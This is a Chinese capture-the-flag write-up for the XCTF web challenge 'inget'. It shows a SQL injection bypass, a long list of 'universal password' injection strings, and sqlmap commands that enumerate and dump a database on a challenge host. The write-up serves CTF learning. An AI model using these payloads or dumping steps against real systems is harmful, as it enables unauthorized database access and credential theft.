攻防世界24-inget-CTFWeb
攻防世界24-inget-CTFWeb
解法1:
直接
?id=' or 1=1 –+
或
?id=' or '1=1
?id=' or '1'='1
–+是什么意思?当你只输入 id=' or 1=1 -- 而不包含空格时,某些数据库可能会因为语法错误无法执行,因为 -- 后面需要有一个空格才能正确地注释掉后续内容。
万能密码:
' and '1'='1
' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1
解法2:
sqlmap使用https://blog.csdn.net/weixin_68416970/article/details/138974168
python sqlmap.py -u “http://61.147.171.105:50808/?id=1” –dbs
python sqlmap.py -u “http://61.147.171.105:50808/?id=1” -D cyber –tables
python sqlmap.py -u “http://61.147.171.105:50808/?id=1” -D cyber -T cyber –columns
python sqlmap.py -u “http://61.147.171.105:50808/?id=1” -D cyber -T cyber -C pw –dump
-D 选择使用哪个数据库
-T 选择使用哪个表
-C 选择使用哪个列
--tables 列出当前的表
--columns 列出当前的列
--dump 获取字段中的数据
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果
